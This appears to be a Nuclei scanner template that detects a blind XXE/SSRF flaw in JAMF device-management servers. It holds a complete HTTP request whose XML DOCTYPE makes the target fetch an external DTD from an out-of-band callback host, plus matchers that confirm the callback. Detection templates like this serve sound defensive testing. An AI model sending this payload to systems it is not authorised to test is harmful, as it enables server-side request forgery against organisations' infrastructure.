id: jamf-blind-xxe

info:
  name: JAMF Blind XXE / SSRF
  author: pdteam
  severity: medium
  description: Blind XXE / SSRF exists in JAMF which is a company that provides enterprise-level software solutions for managing and securing Apple devices in organizations.
  reference:
    - https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
  metadata:
    max-request: 1
  tags: xxe,ssrf,jamf

http:
  - raw:
      - |
        POST /client HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version='1.0' encoding='UTF-8' standalone="no"?>
        <!DOCTYPE jamfMessage SYSTEM "http://{{interactsh-url}}/test.xml">
        <ns2:jamfMessage xmlns:ns3="http://www.jamfsoftware.com/JAMFCommunicationSettings" xmlns:ns2="http://www.jamfsoftware.com/JAMFMessage">
          <device>
            <uuid>&test;</uuid>
            <macAddresses />
          </device>
          <application>com.jamfsoftware.jamfdistributionserver</application>
          <messageTimestamp>{{unix_time()}}</messageTimestamp>
          <content xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="ns2:ResponseContent">
            <uuid>00000000-0000-0000-0000-000000000000</uuid>
            <commandType>com.jamfsoftware.jamf.distributionserverinventoryrequest</commandType>
            <status>
              <code>1999</code>
              <timestamp>{{unix_time()}}</timestamp>
            </status>
            <commandData>
              <distributionServerInventory>
                <ns2:distributionServerID>34</ns2:distributionServerID>
              </distributionServerInventory>
            </commandData>
          </content>
        </ns2:jamfMessage>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "http"

      - type: word
        words:
          - "com.jamfsoftware.jss"
# digest: 490a00463044022049a8d6cc1e5794645affa802a26d23812e1080133ccaa70b8c57b64a5e286ee0022053e8f6e4b4f15642babb1f2628870dec9a7b876568e6baadc0e3e4905362db93:922c64590222798bb761d5b6d8e72950